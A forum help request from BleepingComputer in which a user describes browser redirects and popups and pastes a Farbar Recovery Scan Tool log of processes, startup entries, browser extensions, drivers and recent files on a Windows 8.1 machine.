Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Keep seeing popups and links are redirected!


  • This topic is locked This topic is locked
4 replies to this topic

#1 romeoashe

romeoashe

  • Members
  • 4 posts
  • OFFLINE
  •  

Posted 19 January 2017 - 10:03 AM

I have some malware that redirects my browser and creates multiple windows.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 18-01-2017
Ran by Jeff (administrator) on ROMEO (19-01-2017 08:55:43)
Running from C:\Users\Jeff\Desktop
Loaded Profiles: Jeff (Available Profiles: Jeff)
Platform: Windows 8.1 Pro (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(Bitdefender) C:\Program Files\Bitdefender Antivirus Free\updatesrv.exe
(Bitdefender) C:\Program Files\Bitdefender Antivirus Free\vsserv.exe
(Bitdefender) C:\Program Files\Bitdefender Antivirus Free\vsservppl.exe
(Microsoft Corporation) C:\Windows\System32\vmms.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Bitdefender) C:\Program Files\Bitdefender Antivirus Free\bdagent.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Blizzard Entertainment) C:\ProgramData\Battle.net\Agent\Agent.5362\Agent.exe
(Blizzard Entertainment) C:\Program Files (x86)\Battle.net\Battle.net.8288\Battle.net.exe
() C:\Program Files (x86)\Battle.net\Battle.net.8288\Battle.net Helper.exe
() C:\Program Files (x86)\Battle.net\Battle.net.8288\Battle.net Helper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKU\S-1-5-21-70676196-1044080703-4019811828-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27230168 2016-11-15] (Skype Technologies S.A.)
HKU\S-1-5-21-70676196-1044080703-4019811828-1001\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\Bluestacks\HD-Agent.exe
Startup: C:\Users\Jeff\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Curse.lnk [2016-12-30]
ShortcutTarget: Curse.lnk -> C:\Users\Jeff\AppData\Roaming\Curse Client\Bin\Curse.exe (Curse, Inc)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 24.144.0.150 24.144.0.146
Tcpip\..\Interfaces\{2B8372CD-BF51-40C7-A4FA-FB12F4BD7DC1}: [DhcpNameServer] 24.144.0.150 24.144.0.146
Tcpip\..\Interfaces\{9C0B47CE-3980-4819-9C10-D2E7AB8A2565}: [DhcpNameServer] 24.144.0.150 24.144.0.146
ManualProxies: 
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-70676196-1044080703-4019811828-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
 
FireFox:
========
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.facebook.com/"
CHR Profile: C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default [2017-01-19]
CHR Extension: (Google Slides) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-12-05]
CHR Extension: (Google Docs) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-12-05]
CHR Extension: (Google Drive) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-12-05]
CHR Extension: (YouTube) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-12-05]
CHR Extension: (Adblock Plus) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-01-18]
CHR Extension: (Zonkers Arcade Advertising) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgeepimkkghiifgleeoafaoflhobaa [2017-01-17]
CHR Extension: (Google Sheets) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-12-05]
CHR Extension: (Google Docs Offline) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-12-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-18]
CHR Extension: (Gmail) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-12-05]
CHR Extension: (Chrome Media Router) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-05]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [319376 2014-12-03] (Intel Corporation)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1100392 2016-10-28] (Bitdefender)
R2 updatesrv; C:\Program Files\Bitdefender Antivirus Free\updatesrv.exe [100392 2016-11-30] (Bitdefender)
R2 vmms; C:\WINDOWS\system32\vmms.exe [13784064 2015-03-13] (Microsoft Corporation)
R2 vsserv; C:\Program Files\Bitdefender Antivirus Free\vsserv.exe [100392 2016-11-30] (Bitdefender)
R2 vsservppl; C:\Program Files\Bitdefender Antivirus Free\vsservppl.exe [100392 2016-11-30] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [346872 2013-08-22] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23840 2013-08-22] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Bitdefender Antivirus Free\bdfwfpf.sys [127312 2016-02-22] (BitDefender LLC)
R3 edrsensor; C:\WINDOWS\System32\DRIVERS\edrsensor.sys [342016 2016-12-13] (BitDefender S.R.L. Bucharest, ROMANIA)
R1 epp; C:\EEK\bin64\epp.sys [114968 2016-10-31] (Emsisoft Ltd)
R0 gzflt; C:\WINDOWS\System32\drivers\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
S3 lunparser; C:\WINDOWS\System32\drivers\lunparser.sys [19456 2017-01-10] (Microsoft Corporation)
S3 passthruparser; C:\WINDOWS\System32\drivers\passthruparser.sys [22016 2017-01-10] (Microsoft Corporation)
S3 pvhdparser; C:\WINDOWS\System32\drivers\pvhdparser.sys [27136 2016-02-05] (Microsoft Corporation)
R3 RTWlanE; C:\WINDOWS\system32\DRIVERS\rtwlane.sys [1936088 2013-07-31] (Realtek Semiconductor Corporation                           )
R2 trufos; C:\WINDOWS\System32\drivers\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
R3 TXEIx64; C:\WINDOWS\System32\drivers\TXEIx64.sys [97320 2015-05-28] (Intel Corporation)
S3 vhdparser; C:\WINDOWS\System32\drivers\vhdparser.sys [18944 2017-01-10] (Microsoft Corporation)
R3 VMSMP; C:\WINDOWS\system32\DRIVERS\vmswitch.sys [689152 2016-03-03] (Microsoft Corporation)
S3 VMSP; C:\WINDOWS\system32\DRIVERS\vmswitch.sys [689152 2016-03-03] (Microsoft Corporation)
S3 VMSVSF; C:\WINDOWS\system32\DRIVERS\vmswitch.sys [689152 2016-03-03] (Microsoft Corporation)
S3 VMSVSP; C:\WINDOWS\system32\DRIVERS\vmswitch.sys [689152 2016-03-03] (Microsoft Corporation)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [34760 2013-08-22] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [265056 2013-08-22] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [124256 2013-08-22] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-01-19 08:55 - 2017-01-19 08:56 - 00010286 _____ C:\Users\Jeff\Desktop\FRST.txt
2017-01-19 05:41 - 2017-01-19 08:07 - 00000000 ____D C:\EEK
2017-01-19 05:40 - 2017-01-19 05:41 - 282736816 _____ C:\Users\Jeff\Downloads\EmsisoftEmergencyKit.exe
2017-01-19 05:37 - 2017-01-19 05:38 - 00023943 _____ C:\Users\Jeff\Downloads\Addition.txt
2017-01-19 05:35 - 2017-01-19 08:55 - 00000000 ____D C:\FRST
2017-01-19 05:35 - 2017-01-19 05:35 - 02419712 _____ (Farbar) C:\Users\Jeff\Desktop\FRST64.exe
2017-01-19 05:29 - 2017-01-19 05:29 - 00209444 _____ C:\TDSSKiller.3.1.0.12_19.01.2017_05.29.03_log.txt
2017-01-19 05:28 - 2017-01-19 05:28 - 04747704 _____ (AO Kaspersky Lab) C:\Users\Jeff\Downloads\tdsskiller.exe
2017-01-19 05:12 - 2017-01-19 05:12 - 00388608 _____ (Trend Micro Inc.) C:\Users\Jeff\Downloads\HijackThis.exe
2017-01-19 01:22 - 2017-01-19 01:22 - 00028750 _____ C:\ProgramData\agent.1484810568.bdinstall.bin
2017-01-19 01:19 - 2016-03-14 22:04 - 00023672 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bdelam.sys
2017-01-19 01:17 - 2017-01-19 01:17 - 00003640 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2017-01-19 01:17 - 2017-01-19 01:17 - 00001150 _____ C:\Users\Public\Desktop\Bitdefender Antivirus Free.lnk
2017-01-19 01:17 - 2017-01-19 01:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender Antivirus Free
2017-01-19 01:17 - 2016-12-13 18:18 - 00342016 _____ (BitDefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\edrsensor.sys
2017-01-19 01:17 - 2016-10-29 09:54 - 00182944 _____ (BitDefender LLC) C:\WINDOWS\system32\Drivers\gzflt.sys
2017-01-19 01:17 - 2016-09-20 04:17 - 01605376 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avc3.sys
2017-01-19 01:17 - 2016-09-20 04:16 - 00878072 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avckf.sys
2017-01-19 01:16 - 2017-01-19 08:56 - 00000000 ____D C:\Program Files\Bitdefender Antivirus Free
2017-01-19 01:16 - 2016-06-22 15:40 - 00520032 _____ (BitDefender S.R.L.) C:\WINDOWS\system32\Drivers\trufos.sys
2017-01-19 01:15 - 2017-01-19 08:11 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-01-19 01:14 - 2017-01-19 08:20 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-01-19 01:13 - 2017-01-19 01:13 - 00001114 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2017-01-19 01:13 - 2017-01-19 01:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2017-01-19 01:13 - 2017-01-19 01:13 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-01-19 01:13 - 2017-01-19 01:13 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2017-01-19 01:13 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2017-01-19 01:13 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2017-01-19 01:13 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-01-18 06:09 - 2017-01-18 06:09 - 03988944 _____ C:\Users\Jeff\Downloads\adwcleaner_6.042.exe
2017-01-14 05:00 - 2017-01-14 05:00 - 00000973 _____ C:\Users\Public\Desktop\Minecraft.lnk
2017-01-14 05:00 - 2017-01-14 05:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft
2017-01-14 04:50 - 2017-01-14 04:50 - 00017152 _____ C:\Users\Jeff\Downloads\MCLeaksAuthenticator.zip
2017-01-12 09:42 - 2016-02-05 08:46 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pvhdparser.sys
2017-01-12 09:42 - 2015-11-05 07:10 - 01398104 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-01-12 09:42 - 2015-11-05 07:10 - 01367384 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-01-12 09:42 - 2015-09-29 17:41 - 01391448 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2017-01-12 09:42 - 2015-09-29 17:41 - 01264472 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2017-01-12 09:42 - 2015-05-11 18:24 - 00068952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2017-01-12 09:42 - 2015-05-11 18:24 - 00019800 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdhvcom.dll
2017-01-12 09:42 - 2015-03-13 18:18 - 13784064 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmms.exe
2017-01-12 09:42 - 2015-03-08 18:25 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmickvpexchange.dll
2017-01-12 09:42 - 2015-03-08 18:24 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmicguestinterface.dll
2017-01-12 09:42 - 2015-03-08 18:23 - 00174592 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmicshutdown.dll
2017-01-12 09:42 - 2015-03-08 18:23 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmictimesync.dll
2017-01-12 09:42 - 2015-03-08 18:22 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmicheartbeat.dll
2017-01-12 09:42 - 2015-03-08 18:21 - 00154624 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmicvss.dll
2017-01-12 09:42 - 2015-03-08 18:20 - 00154624 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmicrdv.dll
2017-01-10 22:28 - 2017-01-19 08:25 - 27590656 _____ C:\WINDOWS\system32\vmguest.iso
2017-01-10 22:24 - 2017-01-10 22:24 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hyper-V Management Tools
2017-01-10 22:24 - 2017-01-10 22:24 - 00000000 ____D C:\WINDOWS\vmguest
2017-01-10 22:24 - 2017-01-10 22:24 - 00000000 ____D C:\WINDOWS\system32\BestPractices
2017-01-10 22:24 - 2017-01-10 22:24 - 00000000 ____D C:\Users\Public\Documents\Hyper-V
2017-01-10 22:24 - 2017-01-10 22:24 - 00000000 ____D C:\Program Files\Hyper-V
2017-01-10 22:14 - 2017-01-10 22:14 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\Mozilla
2017-01-10 22:14 - 2017-01-10 22:14 - 00000000 ____D C:\Users\Jeff\AppData\Local\Macromedia
2017-01-10 22:14 - 2016-11-23 07:37 - 00000570 _____ C:\Users\Jeff\AppData\Local\TroubleshooterConfig.json
2017-01-10 22:12 - 2017-01-10 22:55 - 00000000 ____D C:\Users\Jeff\AppData\Local\Bluestacks
2016-12-29 20:01 - 2016-12-29 20:01 - 00000000 ____D C:\WINDOWS\system32\tuv
2016-12-29 19:49 - 2016-12-29 19:49 - 00000000 ____D C:\WINDOWS\TEMPfolder
2016-12-29 19:49 - 2016-12-29 19:49 - 00000000 ____D C:\Program Files\PWIVDSSA88
2016-12-29 19:48 - 2016-12-29 20:06 - 00000000 ____D C:\WINDOWS\system32\SSL
2016-12-28 22:25 - 2017-01-19 01:25 - 00000000 ____D C:\Users\Jeff\AppData\Local\Abmgworks
2016-12-28 22:15 - 2017-01-19 05:56 - 00455048 _____ C:\WINDOWS\ntbtlog.txt
2016-12-28 21:51 - 2017-01-19 05:24 - 00000625 _____ C:\Users\Jeff\Desktop\JRT.txt
2016-12-28 21:48 - 2017-01-19 07:57 - 00000000 ____D C:\AdwCleaner
2016-12-28 21:47 - 2016-12-28 21:47 - 01663040 _____ (Malwarebytes) C:\Users\Jeff\Downloads\JRT.exe
2016-12-28 20:56 - 2016-12-28 20:56 - 00000004 _____ C:\Users\Jeff\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
2016-12-28 20:49 - 2017-01-19 01:25 - 00000000 ____D C:\Users\Jeff\AppData\Local\Epkttion
2016-12-27 21:52 - 2016-12-27 21:52 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\Macromedia
2016-12-27 21:51 - 2016-12-27 21:51 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\TheBannerSaga2
2016-12-27 21:51 - 2016-12-27 21:51 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\Steam
2016-12-27 21:49 - 2016-12-30 19:33 - 00001237 _____ C:\Users\Jeff\Desktop\The Banner Saga 2.lnk
2016-12-27 21:49 - 2016-12-27 21:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Banner Saga 2
2016-12-27 21:46 - 2016-12-27 21:49 - 00000000 ____D C:\Program Files (x86)\The Banner Saga 2
2016-12-27 21:46 - 2016-12-27 21:46 - 00003324 _____ C:\WINDOWS\System32\Tasks\SessionAgent
2016-12-27 17:21 - 2017-01-19 02:06 - 00000000 ____D C:\Users\Jeff\Downloads\The Banner Saga 2+crack incl
2016-12-23 02:41 - 2016-12-30 19:34 - 00047104 ___SH C:\Users\Jeff\Desktop\Thumbs.db
2016-12-23 02:40 - 2016-12-23 02:40 - 00002092 _____ C:\Users\Jeff\AppData\Local\recently-used.xbel
2016-12-23 02:20 - 2016-12-23 02:40 - 00000000 ____D C:\Users\Jeff\AppData\Local\gtk-2.0
2016-12-23 02:20 - 2016-12-23 02:20 - 00000000 ____D C:\Users\Jeff\.thumbnails
2016-12-23 02:17 - 2016-12-23 02:17 - 00000000 ____D C:\Users\Jeff\AppData\Local\fontconfig
2016-12-23 02:16 - 2016-12-23 02:40 - 00000000 ____D C:\Users\Jeff\.gimp-2.8
2016-12-23 02:16 - 2016-12-23 02:16 - 00000000 ____D C:\Users\Jeff\AppData\Local\gegl-0.2
2016-12-20 15:35 - 2017-01-10 15:56 - 00000000 ____D C:\Romeo
2016-12-20 15:35 - 2016-12-30 19:33 - 00000660 _____ C:\Users\Jeff\Desktop\Romeo - Shortcut.lnk
2016-12-20 00:16 - 2015-07-30 08:04 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2016-12-20 00:16 - 2015-07-30 07:48 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-01-19 08:56 - 2016-12-05 02:17 - 00000000 ____D C:\Users\Jeff\AppData\Local\Battle.net
2017-01-19 08:20 - 2016-12-05 02:16 - 00000000 ____D C:\Program Files (x86)\Battle.net
2017-01-19 08:16 - 2016-12-05 01:11 - 00863596 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-01-19 08:16 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\Inf
2017-01-19 08:12 - 2016-12-05 02:41 - 00003606 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2017-01-19 08:11 - 2016-12-05 02:30 - 00000000 __SHD C:\Users\Jeff\IntelGraphicsProfiles
2017-01-19 08:10 - 2013-08-22 08:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-01-19 05:15 - 2013-08-22 07:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2017-01-19 05:12 - 2016-12-05 01:10 - 00000000 ____D C:\Users\Jeff\AppData\Local\VirtualStore
2017-01-19 04:23 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\rescache
2017-01-19 02:22 - 2016-12-05 01:15 - 00003596 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-70676196-1044080703-4019811828-1001
2017-01-18 19:27 - 2016-12-19 11:57 - 00002465 _____ C:\Users\Jeff\Desktop\Hearthstone Deck Tracker.lnk
2017-01-18 19:27 - 2016-12-19 11:57 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HearthSim
2017-01-18 19:27 - 2016-12-19 11:57 - 00000000 ____D C:\Users\Jeff\AppData\Local\SquirrelTemp
2017-01-18 19:27 - 2016-12-19 11:57 - 00000000 ____D C:\Users\Jeff\AppData\Local\HearthstoneDeckTracker
2017-01-18 06:19 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\AppCompat
2017-01-17 23:12 - 2016-12-05 02:15 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\Curse Client
2017-01-17 17:43 - 2016-12-05 16:07 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\Skype
2017-01-16 03:53 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-01-15 01:29 - 2013-08-22 09:20 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-01-14 09:45 - 2016-12-07 00:51 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-01-14 09:42 - 2016-12-07 00:50 - 135657872 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-01-14 05:23 - 2016-12-05 16:20 - 00001125 _____ C:\Users\Jeff\Desktop\nativelog.txt
2017-01-14 05:01 - 2016-12-05 16:10 - 00000000 ____D C:\Program Files (x86)\Minecraft
2017-01-10 22:55 - 2013-08-22 09:36 - 00000000 __RHD C:\Users\Public\Libraries
2017-01-10 22:24 - 2016-12-10 02:55 - 00411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\vsconfig.dll
2017-01-10 22:24 - 2016-12-10 02:48 - 00704000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Wnv.sys
2017-01-10 22:24 - 2016-12-10 02:47 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\wnvapi.dll
2017-01-10 22:24 - 2016-12-10 02:47 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\system32\RdvGpuInfo.dll
2017-01-10 22:24 - 2016-12-10 00:06 - 06287872 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmwp.exe
2017-01-10 22:24 - 2016-12-10 00:01 - 02267136 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdp4vs.dll
2017-01-10 22:24 - 2016-12-08 14:48 - 00421376 _____ (Microsoft Corporation) C:\WINDOWS\system32\synthnic.dll
2017-01-10 22:24 - 2016-12-08 14:48 - 00350720 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmulatedNic.dll
2017-01-10 22:24 - 2016-12-08 14:44 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\system32\synthstor.dll
2017-01-10 22:24 - 2016-12-08 14:44 - 00257536 _____ (Microsoft Corporation) C:\WINDOWS\system32\synthfcvdev.dll
2017-01-10 22:24 - 2016-12-08 14:43 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdparser.sys
2017-01-10 22:24 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\schemas
2017-01-10 22:24 - 2013-08-22 05:48 - 00014688 _____ C:\WINDOWS\system32\sbresources.dll
2017-01-10 22:24 - 2013-08-22 05:46 - 01466522 _____ C:\WINDOWS\system32\WindowsVirtualization.V2.mof
2017-01-10 22:24 - 2013-08-22 05:39 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\passthruparser.sys
2017-01-10 22:24 - 2013-08-22 05:39 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\lunparser.sys
2017-01-10 22:24 - 2013-08-22 05:38 - 00039739 _____ C:\WINDOWS\system32\hypervisor.mof
2017-01-10 22:24 - 2013-08-22 04:59 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\HyperVSysprepProvider.dll
2017-01-10 22:24 - 2013-08-22 04:35 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemoteFileBrowse.dll
2017-01-10 22:24 - 2013-08-22 03:39 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmbusvdev.dll
2017-01-10 22:24 - 2013-08-22 02:25 - 00533504 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmconnect.exe
2017-01-10 22:24 - 2013-08-22 01:35 - 00144967 _____ C:\WINDOWS\system32\virtmgmt.msc
2017-01-10 22:23 - 2013-08-22 03:53 - 00033280 _____ C:\WINDOWS\system32\ActivationVdev.dll
2017-01-10 22:23 - 2013-08-22 03:38 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmprox.dll
2017-01-10 22:23 - 2013-08-22 03:38 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmwpctrl.dll
2017-01-06 17:44 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-12-30 19:33 - 2016-12-14 00:55 - 00001726 _____ C:\Users\Public\Desktop\League of Legends.lnk
2016-12-30 19:33 - 2016-12-11 02:13 - 00001014 _____ C:\Users\Jeff\Desktop\Cronus PRO.lnk
2016-12-30 19:33 - 2016-12-09 12:42 - 00001453 _____ C:\Users\Jeff\Desktop\DAOrigins.exe - Shortcut.lnk
2016-12-30 19:33 - 2016-12-06 21:47 - 00001765 _____ C:\Users\Public\Desktop\Dragon Age Origins.lnk
2016-12-30 19:33 - 2016-12-05 16:07 - 00002707 _____ C:\Users\Public\Desktop\Skype.lnk
2016-12-30 19:33 - 2016-12-05 02:33 - 00000968 _____ C:\Users\Public\Desktop\Hearthstone.lnk
2016-12-30 19:33 - 2016-12-05 02:26 - 00000896 _____ C:\Users\Jeff\Desktop\Downloads - Shortcut.lnk
2016-12-30 19:33 - 2016-12-05 02:22 - 00001806 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vuze.lnk
2016-12-30 19:33 - 2016-12-05 02:22 - 00001788 _____ C:\Users\Public\Desktop\Vuze.lnk
